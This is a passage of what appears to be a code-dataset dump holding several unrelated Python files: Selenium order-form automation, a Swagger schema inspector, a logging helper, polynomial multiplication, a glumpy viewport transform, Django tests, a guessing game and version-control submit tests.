manufacturer is in the list, click to select it\n            for i in names:\n                if i.text == manu_name:\n                    i.click()\n                    break\n\n            logger.info(\"--- After selecting the manufacturer, click OK ---\")\n            # Click OK after selecting the manufacturer\n            self.find_element(loc.manu_yes_loc).click()\n            try:\n                # Check whether an error prompt box appears\n                self.wait_ele_visible(loc.manu_msg_loc, visible=None)\n            except:\n                logger.exception(\"--- Prompt: please select a manufacturer ---\")\n                raise\n            else:\n                logger.info(\"--- Manufacturer selected successfully ---\")\n        except:\n            logger.exception(\"--- Error: the selected manufacturer does not exist ---\")\n\n    # Enter the detailed address\n    def input_address(self, address=None):\n        # If the detailed-address input box is empty, fill it in\n        if self.find_element(loc.address_loc).get_attribute(\"value\"):\n            pass\n        else:\n            logger.info(\"--- Entering detailed address: {} ---\".format(address))\n            self.find_element(loc.address_loc).send_keys(address)\n\n    # Select the material type\n    def select_product(self):\n        # Select material type - sheet material - punch material\n        logger.info(\"--- Selecting material type ---\")\n        self.find_element(loc.product_loc).click()\n        logger.info(\"--- Selecting sheet material ---\")\n        self.find_element(loc.product_name_loc).click()\n        logger.info(\"--- Selecting the first level ---\")\n        self.find_element(loc.product_name1_loc).click()\n\n    # Enter the specification\n    def input_size(self, size):\n        logger.info(\"--- Entering specification: {} ---\".format(size))\n        self.find_element(loc.size_loc).send_keys(size)\n\n    # Enter the sale unit price\n    def input_sale_unit_price(self, sale_unit_price):\n        logger.info(\"--- Entering sale unit price: {} ---\".format(sale_unit_price))\n        self.find_element(loc.sale_unit_price_loc).send_keys(sale_unit_price)\n\n    # Enter the purchase unit price\n    def input_purchase_unit_price(self, purchase_unit_price):\n        logger.info(\"--- Entering purchase unit price: {} ---\".format(purchase_unit_price))\n        self.find_element(loc.purchase_unit_price_loc).send_keys(purchase_unit_price)\n\n    # Enter the purchase quantity\n    def input_purchase_amount(self, purchase_amount):\n        logger.info(\"--- Entering purchase quantity: {} ---\".format(purchase_amount))\n        self.find_element(loc.purchase_amount_loc).send_keys(purchase_amount)\n\n    # Enter the settlement cycle\n    def input_settle_cycle(self, settle_cycle):\n        logger.info(\"--- Entering settlement cycle: {} ---\".format(settle_cycle))\n        self.find_element(loc.settle_cycle_loc).send_keys(settle_cycle)\n\n    # Enter the purchase start time\n    def input_begin_time(self, begin_time):\n        logger.info(\"--- Entering purchase start time: {} ---\".format(begin_time))\n        self.find_element(loc.begin_time_loc).clear()\n        self.find_element(loc.begin_time_loc).send_keys(begin_time)\n\n    # Enter the purchase end time\n    def input_end_time(self, end_time):\n        logger.info(\"--- Entering purchase end time: {} ---\".format(end_time))\n        self.find_element(loc.end_time_loc).clear()\n        self.find_element(loc.end_time_loc).send_keys(end_time)\n\n    # Make the order visible to suppliers\n    def 
select_supply_user_yes(self):\n        logger.info(\"--- Making the order visible to suppliers ---\")\n        self.find_element(loc.supply_user_yes).click()\n\n    # Enter the description\n    def input_desc(self, desc):\n        logger.info(\"--- Entering description: {} ---\".format(desc))\n        self.find_element(loc.desc_loc).send_keys(desc)\n\n    # Select the purchasing manager\n    def select_linker(self, linker_name):\n        logger.info(\"--- Selecting purchasing manager: {} ---\".format(linker_name))\n        # Click the select button\n        self.find_element(loc.linker_loc).click()\n        # Get the names of all purchasing managers\n        names = self.find_elements(loc.linker_name_loc)\n        try:\n            # If the desired purchasing manager is in the list, click to select it\n            for i in names:\n                if i.text == linker_name:\n                    i.click()\n                    break\n\n            logger.info(\"--- After selecting the purchasing manager, click OK ---\")\n            self.find_element(loc.select_linker_yes_loc).click()\n            try:\n                # Check whether an error prompt box appears\n                self.wait_ele_visible(loc.linker_msg_loc, visible=None)\n            except:\n                logger.exception(\"--- Prompt: please select a purchasing manager ---\")\n                raise\n            else:\n                logger.info(\"--- Purchasing manager selected successfully ---\")\n        except:\n            logger.info(\"--- Error: the selected purchasing manager does not exist ---\")\n\n    # Submit the order\n    def submit_click(self):\n        logger.info(\"--- Clicking submit order ---\")\n        self.find_element(loc.submit_loc).click()\n        logger.info(\"--- Order submitted successfully ---\")\n\n    def create_order(self, kind, manu_name, address, size, sale_unit_price, purchase_unit_price, purchase_amount\n                     , settle_cycle, begin_time, end_time, linker_name, desc):\n        \"\"\"\n        End-to-end flow for creating an order\n        :param kind: category\n        :param manu_name: manufacturer name\n        :param address: detailed address\n        :param size: specification description\n        :param sale_unit_price: sale unit price\n        :param purchase_unit_price: purchase unit price\n        :param purchase_amount: purchase quantity\n        :param settle_cycle: settlement cycle\n        :param begin_time: start time\n        :param end_time: end time\n        :param linker_name: purchasing manager\n        :param desc: description\n        \"\"\"\n        # Select the category\n        self.select_kind(kind)\n        # Select the manufacturer\n        self.select_manu(manu_name)\n        # Enter the detailed address if it is missing\n        self.input_address(address)\n        # Select the product name (a fixed one is used)\n        self.select_product()\n        # Enter the specification\n        self.input_size(size)\n        # Enter the sale unit price\n        self.input_sale_unit_price(sale_unit_price)\n        # Enter the pre-purchase unit price\n        self.input_purchase_unit_price(purchase_unit_price)\n        # Enter the pre-purchase quantity\n        self.input_purchase_amount(purchase_amount)\n        # Enter the settlement cycle\n        self.input_settle_cycle(settle_cycle)\n        # Enter the start date and time\n        self.input_begin_time(begin_time)\n        # Enter the end date and time\n        self.input_end_time(end_time)\n        # Make visible to suppliers\n        self.select_supply_user_yes()\n        # Select the purchasing manager\n        self.select_linker(linker_name)\n        # Enter the description\n        self.input_desc(desc)\n        # Click submit\n        self.submit_click()","sub_path":"Desktop/GitTest/2021_SQM_Project/B2B_UI_Automate_Code/study_web_unit/pageobject/订单管理/page_创建订单页.py","file_name":"page_创建订单页.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"447370199","text":"import typing\n\nfrom drf_yasg import openapi\nfrom drf_yasg.inspectors import SwaggerAutoSchema as SwaggerAutoSchemaBase\nfrom drf_yasg.utils import merge_params\n\nfrom .generation import build_responses_schemas\nfrom ..drf.input_serializer import InputSerializer\nfrom ..web.request_body_annotation import RequestBodyAnnotation\nfrom ..routing import Route\nfrom ..routing import RouteAnnotation\nfrom ..schema.generation import build_method_parameters\nfrom ..schema.generation import get_schema_title\nfrom ..schema.type_inspection import inspect_type\n\n\nclass SwaggerAutoSchema(SwaggerAutoSchemaBase):\n\n    def get_operation(self, operation_keys):\n        route = self._get_route()\n        if route is None:\n            return super().get_operation(operation_keys)\n        method = route.method\n        consumes = self._get_consumes(route)\n        produces = self._get_produces(route)\n\n        body = self._get_request_body_parameters(route)\n        manual_parameters = build_method_parameters(route)\n        parameters = 
merge_params(body, manual_parameters)\n\n        operation_id = method.full_name\n        description = method.docstring.short_description\n        deprecated = self.is_deprecated()\n        responses = self._get_responses(route)\n        tags = self.get_tags(operation_keys)\n\n        return openapi.Operation(\n            operation_id=operation_id,\n            description=description,\n            responses=responses,\n            parameters=parameters,\n            consumes=consumes,\n            produces=produces,\n            deprecated=deprecated,\n            tags=tags,\n        )\n\n    def _get_responses(self, route: Route):\n        responses_schemas = build_responses_schemas(route)\n        return openapi.Responses(responses=self.get_response_schemas(responses_schemas))\n\n    def _get_consumes(self, route: Route):\n        route_annotation = route.method.annotations.get_one_or_none(RouteAnnotation)\n        if route_annotation is None or route_annotation.consumes is None:\n            return self.get_consumes()\n        return [str(media_type) for media_type in route_annotation.consumes]\n\n    def _get_produces(self, route: Route):\n        route_annotation = route.method.annotations.get_one_or_none(RouteAnnotation)\n\n        if route_annotation is None or route_annotation.produces is None:\n            return self.get_produces()\n        return [str(media_type) for media_type in route_annotation.produces]\n\n    def _get_request_body_parameters(self, route: Route) -> typing.List[openapi.Parameter]:\n        method = route.method\n        input_serializer = method.annotations.get_one_or_none(InputSerializer)\n        if input_serializer is not None:\n            serializer = input_serializer.class_()\n            schema = self.get_request_body_schema(serializer)\n            return [openapi.Parameter(name='data', in_=openapi.IN_BODY, required=True, schema=schema)]\n        request_body_annotation = method.annotations.get_one_or_none(RequestBodyAnnotation)\n\n        if request_body_annotation is not None:\n            argument = method.get_argument(request_body_annotation.argument_name)\n            type_info = inspect_type(argument.type_)\n            title = get_schema_title(argument)\n            schema = openapi.Schema(title=title, **type_info.as_dict())\n            return [openapi.Parameter(name='data', in_=openapi.IN_BODY, required=True, schema=schema)]\n        return []\n\n    def _get_route(self) -> typing.Optional[Route]:\n        view_cls = type(self.view)\n        func = getattr(view_cls, self.method.lower(), None)\n        return getattr(func, 'route', None)\n","sub_path":"winter/schema/inspectors.py","file_name":"inspectors.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555853975","text":"import logging\n\nfrom src.helper_classes.Exceptions import NotAStringException\nfrom src.validator_classes.StringValidator import StringValidator\n\n\n# helper class for writing log entries to a file\nclass Loggable:\n    # constructor\n    def __init__(self):\n        Loggable.__logging_module_initiated = False\n\n    # initializes the logging module (if not yet initialized)\n    def _init_logging_module(self):\n        if not self.__logging_module_initiated:\n            logging.basicConfig(filename=\"program_log.log\",\n                                filemode='a',\n                                format='%(asctime)s %(message)s',\n                                datefmt='%H:%M:%S',\n                                level=logging.DEBUG)\n            self.__logging_module_initiated = True\n\n    # writes the given string to the log\n    def _log(self, value_to_log):\n        if self.__is_string(value_to_log) and self.__logging_module_initiated:\n            logging.info(value_to_log)\n\n    # checks whether the given value is a string\n    def __is_string(self, value_to_check):\n        validator = StringValidator()\n\n        try:\n            validator.validate(value_to_check)\n        except NotAStringException:\n            if not self.__logging_module_initiated:\n                self._init_logging_module()\n\n            
self._log(\"Value passed to log is not a string\")\n return False\n\n return True\n","sub_path":"Lab_2/src/helper_classes/Loggable.py","file_name":"Loggable.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"509969195","text":"# Myself 1ºTime\ndef sum_poly(sum_list):\n new_list = [0 for i in range(len(sum_list[-1]))]\n for i in range(len(sum_list)):\n for j in range(len(sum_list[i])):\n new_list[j] += sum_list[i][j]\n return new_list[::-1]\n\n\ndef multiply_poli(coef_1, coef_2):\n partial_sums_list = []\n aux = []\n if len(coef_1) < len(coef_2):\n coef_1, coef_2 = coef_2, coef_1\n for i in range(len(coef_2)):\n for j in range(len(coef_1)):\n aux.append(coef_1[-(j + 1)] * coef_2[-(i + 1)])\n partial_sums_list.append(aux)\n aux = [0 for i in range(i + 1)]\n return sum_poly(partial_sums_list)\n\n# Duarte\ndef multiply_2(coef_1, coef_2):\n dict = {}\n if len(coef_1) < len(coef_2):\n coef_1, coef_2 = coef_2, coef_1\n coef_1, coef_2 = coef_1[::-1], coef_2[::-1]\n for index1, num1 in enumerate(coef_1):\n for index2, num2 in enumerate(coef_2):\n dict[index1 +\n index2] = dict.get(index2 + index1, 0) + (num1 * num2)\n return list(j for i, j in sorted(dict.items(), reverse=True))\n\n\nif __name__ == \"__main__\":\n coef_1 = [1, 2, 3, 4]\n coef_2 = [1, 2, 3]\n print(multiply_poli(coef_1, coef_2))\n","sub_path":"Clube de Programação/Code/Clube_01_3.py","file_name":"Clube_01_3.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323360561","text":"# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2014, Nicolas P. Rougier\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n# -----------------------------------------------------------------------------\n\"\"\"\nViewport transform\n\nThe viewport transform allows to restrict the display of a scene to a local\nviewport.\n\nThe transform is connected to the following events:\n\n * attach (initialization)\n * resize (update)\n\nRelevant shader code:\n\n * transforms/viewport.glsl\n\n\"\"\"\nfrom glumpy import library\nfrom . 
transform import Transform\n\n\nclass Viewport(Transform):\n    \"\"\"\n    The viewport transform restricts the display of a scene to a local\n    viewport.\n    \"\"\"\n\n    aliases = { \"clipping\"  : \"viewport_clipping\",\n                \"transform\" : \"viewport_transform\",\n                \"local\"     : \"viewport_local\",\n                \"extents\"   : \"viewport_local\",\n                \"global\"    : \"viewport_global\" }\n\n\n    def __init__(self, code=None, *args, **kwargs):\n        \"\"\"\n        Initialize the transform.\n        Note that parameters must be passed by name (param=value).\n\n        Kwargs parameters\n        -----------------\n\n        transform : bool (default is True)\n           Whether to enforce viewport transformation\n\n        clipping : bool (default is True)\n           Whether to enforce viewport clipping\n\n        viewport : tuple of 4 floats (default is None)\n           Viewport (x,y,w,h) in window coordinates\n        \"\"\"\n\n        if code is None:\n            code = library.get(\"transforms/viewport.glsl\")\n\n        self._global = 0,0,512,512\n        self._local = Transform._get_kwarg(\"viewport\", kwargs) or None\n        self._clipping = Transform._get_kwarg(\"clipping\", kwargs) or True\n        self._transform = Transform._get_kwarg(\"transform\", kwargs) or True\n\n        Transform.__init__(self, code, *args, **kwargs)\n\n\n\n    @property\n    def extents(self):\n        \"\"\" Viewport extents as (x,y,w,h) (absolute coordinates) \"\"\"\n\n        return self._local\n\n\n    @extents.setter\n    def extents(self, value):\n        \"\"\" Viewport extents as (x,y,w,h) (absolute coordinates) \"\"\"\n\n        self._local = value\n        if self.is_attached:\n            if self._local is None:\n                self[\"local\"] = self._global\n            else:\n                self[\"local\"] = self._local\n            self[\"clipping\"] = self._clipping\n            self[\"transform\"] = self._transform\n\n\n    @property\n    def clipping(self):\n        \"\"\" Whether to enforce viewport clipping \"\"\"\n\n        return self._clipping\n\n\n    @clipping.setter\n    def clipping(self, value):\n        \"\"\" Whether to enforce viewport clipping \"\"\"\n\n        self._clipping = value\n        if self.is_attached:\n            self[\"clipping\"] = self._clipping\n\n\n    @property\n    def transform(self):\n        \"\"\" Whether to enforce viewport transform \"\"\"\n\n        return self._transform\n\n\n    @transform.setter\n    def transform(self, value):\n        \"\"\" Whether to enforce viewport transform \"\"\"\n\n        self._transform = value\n        if self.is_attached:\n            self[\"transform\"] = self._transform\n\n\n\n    def on_attach(self, program):\n        \"\"\" Initialization \"\"\"\n\n        self[\"global\"] = self._global\n        if self._local is None:\n            self[\"local\"] = self._global\n        else:\n            self[\"local\"] = self._local\n        self[\"clipping\"] = self._clipping\n        self[\"transform\"] = self._transform\n\n\n    def on_resize(self, width, height):\n        \"\"\" Update \"\"\"\n\n        self._global = 0, 0, width, height\n        self[\"global\"] = self._global\n        if self._local is None:\n            self[\"local\"] = self._global\n\n        # Transmit signal to other transforms\n        Transform.on_resize(self, width, height)\n","sub_path":"glumpy/transforms/viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532016783","text":"from django.test import TestCase\nfrom prac.models import Item, pendingname\n\nclass TestHomePage(TestCase):\n\n\tdef test_mainpage_returns_view(self):\n\t\tresponse = self.client.get('/')\n\t\tself.assertTemplateUsed(response, 'psrform.html')\n\nclass ORMTest(TestCase):\n\tdef test_save_retrive_list(self):\n\t\tnewName = pendingname()\n\t\t# newName.fname = 'Name one' #####\n\t\t# newName.faddress = 'Address two' #####\n\t\tnewName.save()\n\t\ttxtItem1 
= Item()\n\t\ttxtItem1.text = 'Item one'\n\t\ttxtItem1.pname = newName\n\t\ttxtItem1.address = 'address one'\n\t\ttxtItem1.save()\n\t\ttxtItem2 = Item()\n\t\ttxtItem2.pname = newName\n\t\ttxtItem2.text = 'Item two'\n\t\ttxtItem2.address = 'address two'\n\t\ttxtItem2.save()\n\t\tsavedItems = Item.objects.all()\n\t\tsavedFirstdata = pendingname.objects.all()\n\t\tsavedpendingname = pendingname.objects.first()\n\t\tself.assertEqual(savedItems.count(), 2)\n\t\tself.assertEqual(savedpendingname, newName)\n\t\tsavedItem1 = savedItems[0]\n\t\tsavedItem2 = savedItems[1]\n\t\tself.assertEqual(savedItem1.text, 'Item one')\n\t\tself.assertEqual(savedItem2.text, 'Item two')\n\t\tself.assertEqual(savedItem1.pname, newName)\n\t\tself.assertEqual(savedItem2.pname, newName)\n\t\tself.assertEqual(savedItem1.address, 'address one')\n\t\tself.assertEqual(savedItem2.address, 'address two')\n\t\n\t\n\nclass ViewingTest(TestCase):\n\tdef test_displays_for_each_pendingname(self):\n\t\tnewName = pendingname.objects.create()\n\t\taddress = pendingname.objects.create() # this one\n\t\tItem.objects.create(pname=newName, text='Liza') # change the text here and above later\n\t\tItem.objects.create(pname=newName, text='Gil')\n\t\tresponse = self.client.get(f'/prac/{newName.id}/')\n\t\tself.assertContains(response, 'Liza')\n\t\tself.assertContains(response, 'Gil')\n\n\t\tnewName_2 = pendingname.objects.create()\n\t\tItem.objects.create(pname=newName_2, text='Bernardo') # change the text here and above later\n\t\tItem.objects.create(pname=newName_2, text='Padilla')\n\t\tresponse = self.client.get(f'/prac/{newName_2.id}/')\n\t\tself.assertNotContains(response, 'Liza')\n\t\tself.assertNotContains(response, 'Gil')\n\n\n\tdef test_listviewing_uses_listpage(self):\n\t\tnewName = pendingname.objects.create()\n\t\tresponse = self.client.get(f'/prac/{newName.id}/')\n\t\tself.assertTemplateUsed(response, 'psrlist.html') # this is the HTML template I changed\n \n\tdef test_pass_list_temp(self):\n\t\tsubsidy1 = pendingname.objects.create()\n\t\tsubsidy2 = pendingname.objects.create()\n\t\tpassinglistahan = pendingname.objects.create()\n\t\tresponse = self.client.get(f'/prac/{passinglistahan.id}/')\n\t\tself.assertEqual(response.context['pn'], passinglistahan) # passing data to the template\n\n\nclass creatingnewlisttest(TestCase):\n\t\n\tdef test_for_POST_request_to_save(self):\n\t\tresponse = self.client.post('/prac/newlist_url', data={\"surname\" : ['sname', 'fname' ],\"address\" : 'address', })\n\t\tself.assertEqual(Item.objects.count(), 1) # ^^ the URL really has no trailing slash\n\t\tnewIt = Item.objects.first()\n\t\t# self.assertEqual(newIt.text, 'sname')\n\t\t# self.assertEqual(newIt.address, 'address')\n\n\tdef test_POST_redirect_go_roli(self):\n\t\tresponse = self.client.post('/prac/newlist_url',data={'surname': ['sname', 'fname'] ,'address': 'address'})\n\t\tnewName = pendingname.objects.first()\n\t\tself.assertRedirects(response, f'/prac/{newName.id}/') \n\nclass addingofitem(TestCase):\n\tdef test_add_POST_existing_list_request(self):\n\t\tayuDa1 = pendingname.objects.create()\n\t\tayuDa2 = pendingname.objects.create()\n\t\texistlist = pendingname.objects.create()\n\t\tself.client.post(f'/prac/{existlist.id}/addItem',data={'surname': 'New Item for existing list', 'address' : 'New address for existing list'})\n\t\tself.assertEqual(Item.objects.count(), 1)\n\t\tnewIt = Item.objects.first()\n\t\tself.assertEqual(newIt.text, 'New Item for existing list')\n\t\tself.assertEqual(newIt.address, 'New address for existing list')\n\t\tself.assertEqual(newIt.pname, 
existlist)\n\n\n\tdef test_redirects_listview(self):\n\t\tayuda1 = pendingname.objects.create()\n\t\tayuda2 = pendingname.objects.create()\n\t\tayuda3 = pendingname.objects.create()\n\t\texistlist = pendingname.objects.create()\n\t\tresponse = self.client.post(f'/prac/{existlist.id}/addItem',data={'surname': 'New Item for existing list','address' : 'New address for existing list'})\n\t\tself.assertRedirects(response, f'/prac/{existlist.id}/')\n\n\n\n#from django.urls import resolve\n#from psr.views import MainPage\n#from django.http import HttpRequest\n#from django.template.loader import render_to_string\n\n\n\t\t# def test_save_necessary_items(self):\n\t\t# \tself.client.get('/')\n\t\t# \tself.assertEqual(Item.objects.count(), 0)\n\n\t\t# def test_displaying_template_list(self):\n\t\t# \tItem.objects.create(text='List item 1')\n\t\t# \tItem.objects.create(text='List item 2')\n\t\t# \tresponse = self.client.get('/')\n\t\t# \tself.assertIn('List item 1', response.content.decode())\n\t\t# \tself.assertIn('List item 2', response.content.decode())\n\n\t\t\n\n\t\t# self.assertEqual(response.status_code, 302)\n\t\t# self.assertEqual(response['location'], '/psr/viewlist_url/')\n\n\n\n\n\n\n#PREVIOUS CODE FOR REFERENCE\n\n\t#self.assertIn('sname', response.content.decode())\n\t\t#self.assertIn('gname', response.content.decode())\n\t\t#self.assertTemplateUsed(response, 'psrform.html')\n\n\n# 'middlename' : 'mname', 'age' : 'age', 'sex' : 'sex',\n\t\t# 'adress' : 'address'})\n\"\"\"\t\n\tdef test_if_root_resolves_mainpage(self):\n\t\tfound = resolve ('/')\n\t\tself.assertEqual(found.func, MainPage)\n\n\tdef tes_mainpage_returns_view(self):\n\t\tresponse = self.client('/')\n\t\thtml = response.content.decode('utf8')\n\t\tmain_html = render_to_string('psrform.html')\n\t\tself.assertEqual(html, main_html)\n\t\tself.assertTemplateUsed(response, 'psrform.html')\n\n\tdef test_mainpage_returns_view(self):\n\t\trequest = HttpRequest()\n\t\tresponse = MainPage(request)\n\t\thtml = response.content.decode('utf8')\n\t\tstring_html = render_to_string('psrform.html')\n\t\tself.assertEqual(html, string_html)\n\n\tdef test_mainpage_view(self):\n\t\trequest = HttpRequest()\n\t\tresponse = MainPage(request)\n\t\thtml = response.content.decode('utf8')\n\t\tself.assertTrue(html.startswith(''))\n\t\tself.assertIn('Pandemic Subsidy Registration', html)\n\t\tself.assertTrue(html.endswith(''))\n# Create your tests here. \"\"\"\n","sub_path":"prac/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58432632","text":"# Simple guess game for checking is the user guess correct ?\n\nclass GuessGame():\n \n def __init__(self,number,minimum=0,maximum = 100):\n \"\"\" This is the constructor of the GuessGame class.\n \n Args:\n number (int): number to guess\n minimum (int, optional): . Defaults to 0.\n maximum (int, optional): . 
Defaults to 100.\n        \"\"\"\n        self.number = number\n        self.guesses = 0\n        self.minimum = minimum\n        self.maximum = maximum\n    \n    def get_guess(self):\n        \"\"\"This function will get the guessed number from the user\n\n        Returns:\n            (int): the user's guessed number (validated)\n        \"\"\"\n        while True:\n            try:\n                guessed = int(input(f'Enter a value between {self.minimum}-{self.maximum} : '))\n                # re-prompt when the guess is out of range\n                if not (self.minimum <= guessed <= self.maximum):\n                    print(f'Please enter a value between {self.minimum}-{self.maximum}')\n                    continue\n                return guessed\n            except ValueError:\n                print('Please enter a number')\n                continue\n    \n    def play_game(self):\n        \"\"\" This is the main function to play the guess game.\n        \"\"\"\n        while True:\n            self.guesses +=1 \n            guess = self.get_guess()\n            if guess == self.number :\n                print(f'Wow! You guessed the number {self.number} in {self.guesses} guesses!')\n                break\n            elif guess < self.number :\n                print('Your guess is too low')\n            else :\n                print('Your guess is too high')\n\n# Create an instance of the GuessGame class and call play_game to play the guess game.\nGuessGame(12).play_game()\n    \n","sub_path":"guess_game.py","file_name":"guess_game.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"563276218","text":"# pylint: disable = redefined-outer-name\n\nimport copy\nimport os\nimport shutil\nimport pytest\n\nfrom universum import __main__\nfrom . import git_utils, perforce_utils, utils\n\n\ndef test_error_no_repo(submit_environment, stdout_checker):\n    settings = copy.deepcopy(submit_environment.settings)\n    if settings.Vcs.type == \"git\":\n        settings.ProjectDirectory.project_root = \"non_existing_repo\"\n        __main__.run(settings)\n        stdout_checker.assert_has_calls_with_param(\"No such directory\")\n    else:\n        settings.PerforceSubmitVcs.client = \"non_existing_client\"\n        __main__.run(settings)\n        stdout_checker.assert_has_calls_with_param(\"Workspace 'non_existing_client' doesn't exist!\")\n\n\n@pytest.fixture()\ndef p4_submit_environment(perforce_workspace, tmpdir):\n    yield perforce_utils.P4Environment(perforce_workspace, tmpdir, test_type=\"submit\")\n\n\n@pytest.mark.parametrize(\"branch\", [\"write-protected\", \"trigger-protected\"])\ndef test_p4_error_forbidden_branch(p4_submit_environment, branch):\n    protected_dir = p4_submit_environment.vcs_cooking_dir.mkdir(branch)\n    file_to_add = protected_dir.join(utils.randomize_name(\"new_file\") + \".txt\")\n    text = \"This is a new line in the file\"\n    file_to_add.write(text + \"\\n\")\n\n    settings = copy.deepcopy(p4_submit_environment.settings)\n    setattr(settings.Submit, \"reconcile_list\", str(file_to_add))\n\n    assert __main__.run(settings)\n\n    p4 = p4_submit_environment.p4\n    # make sure submitter didn't leave any pending CLs in the workspace\n    assert not p4.run_changes(\"-c\", p4_submit_environment.client_name, \"-s\", \"pending\")\n    # make sure submitter didn't leave any pending changes in default CL\n    assert not p4.run_opened(\"-C\", p4_submit_environment.client_name)\n\n\ndef test_p4_success_files_in_default(p4_submit_environment):\n    # This file should not be submitted, it should remain unchanged in default CL\n    p4 = p4_submit_environment.p4\n    p4_file = p4_submit_environment.repo_file\n    p4.run_edit(str(p4_file))\n    text = \"This text should be in file\"\n    p4_file.write(text + \"\\n\")\n\n    # This file should be successfully submitted\n    file_name = utils.randomize_name(\"new_file\") + \".txt\"\n    new_file = p4_submit_environment.vcs_cooking_dir.join(file_name)\n    
new_file.write(\"This is a new file\" + \"\\n\")\n\n settings = copy.deepcopy(p4_submit_environment.settings)\n setattr(settings.Submit, \"reconcile_list\", str(new_file))\n\n assert not __main__.run(settings)\n assert text in p4_file.read()\n\n\ndef test_p4_error_files_in_default_and_reverted(p4_submit_environment):\n # This file should not be submitted, it should remain unchanged in default CL\n p4 = p4_submit_environment.p4\n p4_file = p4_submit_environment.repo_file\n p4.run_edit(str(p4_file))\n text_default = \"This text should be in file\"\n p4_file.write(text_default + \"\\n\")\n\n # This file must fail submit and remain unchanged while not checked out any more\n protected_dir = p4_submit_environment.vcs_cooking_dir.mkdir(\"write-protected\")\n new_file = protected_dir.join(utils.randomize_name(\"new_file\") + \".txt\")\n text_new = \"This is a new line in the file\"\n new_file.write(text_new + \"\\n\")\n\n settings = copy.deepcopy(p4_submit_environment.settings)\n setattr(settings.Submit, \"reconcile_list\", str(new_file))\n\n assert __main__.run(settings)\n assert text_default in p4_file.read()\n assert text_new in new_file.read()\n\n\nclass SubmitterParameters:\n def __init__(self, stdout_checker, environment):\n self.stdout_checker = stdout_checker\n self.submit_settings = environment.settings\n self.environment = environment\n\n def submit_path_list(self, path_list, **kwargs):\n settings = copy.deepcopy(self.submit_settings)\n setattr(settings.Submit, \"reconcile_list\", \",\".join(path_list))\n\n if kwargs:\n for key, value in kwargs.items():\n setattr(settings.Submit, key, value)\n\n return __main__.run(settings)\n\n def assert_submit_success(self, path_list, **kwargs):\n result = self.submit_path_list(path_list, **kwargs)\n assert result == 0\n\n last_cl = self.environment.get_last_change()\n self.stdout_checker.assert_has_calls_with_param(\"==> Change \" + last_cl + \" submitted\")\n\n def file_present(self, file_path):\n return self.environment.file_present(file_path)\n\n def text_in_file(self, text, file_path):\n return self.environment.text_in_file(text, file_path)\n\n\n@pytest.fixture()\ndef submit_parameters(stdout_checker):\n def inner(environment):\n return SubmitterParameters(stdout_checker, environment)\n yield inner\n\n\n@pytest.fixture(params=[\"git\", \"p4\"])\ndef submit_environment(request, perforce_workspace, git_client, tmpdir):\n if request.param == \"git\":\n yield git_utils.GitEnvironment(git_client, tmpdir, test_type=\"submit\")\n else:\n yield perforce_utils.P4Environment(perforce_workspace, tmpdir, test_type=\"submit\")\n\n\ndef test_success_no_changes(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n assert parameters.submit_path_list([]) == 0\n\n\ndef test_success_commit_add_modify_remove_one_file(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = parameters.environment.vcs_cooking_dir.join(file_name)\n file_path = str(temp_file)\n\n # Add a file\n temp_file.write(\"This is a new file\" + \"\\n\")\n parameters.assert_submit_success([file_path])\n assert parameters.file_present(file_path)\n\n # Modify a file\n text = \"This is a new line in the file\"\n temp_file.write(text + \"\\n\")\n parameters.assert_submit_success([file_path])\n assert parameters.text_in_file(text, file_path)\n\n # Delete a file\n temp_file.remove()\n parameters.assert_submit_success([file_path])\n assert not 
parameters.file_present(file_path)\n\n\ndef test_success_ignore_new_and_deleted_while_edit_only(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n new_file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = parameters.environment.vcs_cooking_dir.join(new_file_name)\n temp_file.write(\"This is a new temp file\" + \"\\n\")\n deleted_file_path = str(parameters.environment.repo_file)\n deleted_file_name = os.path.basename(deleted_file_path)\n os.remove(deleted_file_path)\n\n result = parameters.submit_path_list([str(temp_file), deleted_file_path], edit_only=True)\n assert result == 0\n\n parameters.stdout_checker.assert_has_calls_with_param(f\"Skipping '{new_file_name}'\")\n parameters.stdout_checker.assert_has_calls_with_param(f\"Skipping '{deleted_file_name}'\")\n parameters.stdout_checker.assert_has_calls_with_param(\"Nothing to submit\")\n assert parameters.file_present(deleted_file_path)\n assert not parameters.file_present(str(temp_file))\n\n\ndef test_success_commit_modified_while_edit_only(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n target_file = parameters.environment.repo_file\n text = utils.randomize_name(\"This is change \")\n target_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(target_file)], edit_only=True)\n assert parameters.text_in_file(text, str(target_file))\n\n\ndef test_error_review(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n target_file = parameters.environment.repo_file\n target_file.write(\"This is some change\")\n\n result = parameters.submit_path_list([str(target_file)], review=True)\n assert result != 0\n parameters.stdout_checker.assert_has_calls_with_param(\"not supported\")\n\n\ndef test_success_reconcile_directory(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n dir_name = utils.randomize_name(\"new_directory\")\n\n # Create and reconcile new directory\n tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n for i in range(0, 9):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(\"This is 